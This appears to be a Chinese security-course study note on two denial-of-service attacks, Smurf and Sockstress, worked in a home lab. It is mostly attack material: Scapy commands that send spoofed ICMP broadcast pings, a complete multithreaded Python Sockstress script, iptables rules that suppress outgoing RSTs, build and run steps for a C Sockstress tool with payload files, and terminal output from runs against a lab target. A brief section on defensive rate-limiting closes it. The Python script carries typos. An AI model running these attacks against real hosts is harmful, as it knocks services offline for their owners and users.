【安全牛学习笔记】Smurf攻击、Sockstress
来源:互联网 发布:矩阵向量化公式 编辑:程序博客网 时间:2024/05/30 23:01
Smurf攻击
世界上最古老的DDOS攻击技术
- 向广播地址发送伪造源地址的ICMP echo Request (ping) 包
- LAN所有计算机向伪造源地址返回响应包
- 对现代操作系统几乎无效(不响应目标为广播的ping)
Scapy
- i=IP()
- i.dst="1.1.1.255"
- p=ICMP()
- p.display()
- r=(i/p)
- send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
msfadmin@metasploit:~$ ifconf
192.168.1.119
root@K:~# scapy
WARNING: NO route found for IPV6 destination :: (no default route?)
welcome to Scapy (2.3.2)
>>> i=IP()
>>> i.src="192.168.1.119"
>>> i.dst="192.168.1.255"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.119
dst= 192.168.1.255
\options\
>>> p=ICMP()
>>> p.display()
###[ ICMP ]###
type=echo-request
code=0
chksum=None
id=0x0
seq=0x0
>>> send(i/p)
.
Sent 1 packets
>>> r=send(i/p)
.
Sent 1 packets
>>> r.display()
Traceback (most recent call last):
File "<console>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute 'display'
>>> send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
msfadmin@metasploit:~$ sudo tcpdump -i eth0
Sockstress
2008年由Jack C.Louis发现
针对TCP服务的拒绝五福攻击
- 消耗被工具目标系统资源
- 与攻击目标建立大量socket链接
- 完成三次握手,最后的ACK包 windows 大小为0(客户端不接收数据)
- 攻击者资源消耗小(CPU、内存、带宽)
- 异步攻击,单机可拒绝服务高配资源服务器
- Window 窗口实现的TCP流控
root@K:~# cp /media/sf_D_DRIVE/socketress.py .
----------------------------------------------------------------------
[sockstress.py]
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scayp.all import *
from time import sleep
import thread
import logging
import os
import signal
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
if len(sys.argv) !=4:
print "用法: ./sock_stress.py [目标IP] [端口] [线程数]"
print "举例: ./sock_stress.py 10.0.0.5 21 20 ## 请确定呗攻击端口处于开放状态"
sys.exit()
target = str(sys.argv[1])
dstport = int(sys.argv[2])
threads = int(sys.argv[3])
## 攻击函数
def sockstress(target,dstport):
while 0==0;
try:
x = random.randint(0,65535)
response = srl(IP(dst=target)/TCP(sport=x,dport=dstport,flags='S'),timeout=1,verbose=0)
send(IP(dst=target)/ TCP(dsport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq + 1))/'\x00\x00',verbose=0)
except:
pass
## 停止攻击函数
def shutdown(signal, frame):
print '正在恢复 iptables 规则'
os.system('iptable -D OUTPUT -p tcp --tcp-flas RST RST -d ' + target + ' -j DROP')
sys.exit()
## 添加iptables规则
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
signal.signal(signal.SIGINT, shutdown)
## 多线程攻击
print "\n攻击正在进行...按 Ctrl+C 停止攻击"
for x in range(0,threads):
thread.start_new_thread(sockstress, (target,dstport))
## 永远执行
while 0==0:
sleep(1)
----------------------------------------------------------------------
root@K:~# ./sockstress.py
WARNING: No route found for IPV6 destination :: (no default route?)
用法: ./sock_stress.py [目标IP] [端口] [线程数]
举例: ./sock_stress.py 10.0.0.5 21 20 ## 请确定呗攻击端口处于开放状态
root@K:~# ./sockstress.py 192.168.1.119 21 200
WARNING: No route found for IPV6 destination :: (no default route?)
攻击正在进行...按 Ctrl+C 停止攻击
root@K:~# iptable -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~# ifconfig
192.168.1.116
root@K:~# ping 192.168.1.119
root@K:~# ifconfig
10.0.2.15
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB | wc -l
654
msfadmin@metasploit:~$ free -m //内存使用量
root@K:~# nc 192.168.1.119 21
Sockstress
Python 攻击脚本
- ./sockstress.py 1.1.1.1 21 200
C攻击脚本
- http://github.com/defuse/sockstress
- gcc -Wall -c sockstress.c
- gcc -pthread -o sockstress sockstress.o
- ./sockstress 1.1.1.1:80 eth0
- ./sockstress 1.1.1.1:80 eth0 -p payloads/http
防火墙规则
- iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
root@K:~/sockstree-master# gcc -Wall -c sockstress.c
root@K:~/sockstree-master# gcc -pthread -o sockstress sockstress.o
root@K:~/sockstree-master# ./sockstress
SOCKSTRESS - CVE-2008-4609 | havoc@defuase.ca
[!] Too feww arguments
Usage: ./sockstress <ip>:<port><interface> [-p paload] [-d delay]
<ip> Victim IP address
<port> Victim port
<interface> Local network interface (e.g. eth0)
-p payload File containing data to send after connecting
Payload can be at most 1000 bytes
-d delay Microsecnds between SYN packets (default: 10000)
-h Help menu
**You must configure your firewall to drop TCP reset packets sent to <ip>**
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/
dns_a dnx_axfr http smtp
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
root@K:~/sockstree-master# cat payloads/
dns_a dnx_axfr http smtp
root@K:~/sockstree-master# cat payloads/dns_axfr
root@K:~/sockstree-master# cat payloads/http
root@K:~/sockstree-master# cat payloads/smtp
HELO gmail.com
MAIL FROM: foo@gmail.com
RCPT TO: victiom@victim-domain.com
DATA
Subject: AAAAAAAAAAAAA
BBBBBBBBBBBBBBBBBBB
.
QUIT
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuase.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
^C SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 1333
root@K:~/sockstree-master# iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
root@K:~/sockstree-master# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~/sockstree-master# ./sockstress 192.168.1.119:21 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuase.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
[+] SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 0
Sockstress
防御措施
- 直到今天sockstress攻击仍然是一种很有效的DoS攻击方式
- 由于建立完整的TCP三步握手,因此使用syn cookie防御无效
- 根本的防御方法是采用白名单(不实际)
- 折中对策:限制单位时间内每IP建的TCP连接数
封杀每30秒与80端口建立连接超过10个IP的地址
iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --
update --seconds 30 --hitcount 10 -j DROP
以上规则对DDOS攻击无效
msfadmin@metasploit:~$ iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
msfadmin@metasploit:~$ iptable -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP
- 【安全牛学习笔记】Smurf攻击、Sockstress
- Smurf攻击
- smurf攻击
- smurf攻击
- 【安全牛学习笔记】WPA攻击
- 【安全牛学习笔记】 HTTPS攻击
- 【安全牛学习笔记】DNS放大攻击
- 【安全牛学习笔记】SNMP放大攻击
- 【安全牛学习笔记】NTP放大攻击
- 【安全牛学习笔记】拒绝服务攻击工具
- 【安全牛学习笔记】HTTPS攻击
- Smurf攻击的原理
- Smurf攻击手段
- 【安全牛学习笔记】Mac地址绑定攻击
- 【安全牛学习笔记】SSL、TLS中间人攻击
- 【安全牛学习笔记】密码嗅探、中间人攻击
- 【安全牛学习笔记】SSL、TLS中间人攻击
- smurf攻击的工作原理
- 安卓属性动画
- 数据结构实验之栈与队列十一:refresh的停车场
- LeetCode89 Gray Code
- 剑指offer系列(2)——二维数组中的查找
- 训练总结 10.15
- 【安全牛学习笔记】Smurf攻击、Sockstress
- java继承练习(java 第四周)
- python 装饰器
- JAVA “:”无法遍历数组的所有元素问题
- 171015—表达式&数据的输入输出
- Linux setuid位
- Kafka学习笔记<基本概念>
- POJ3623-Best Cow Line, Gold
- SVN的学习之路二(客户端安装)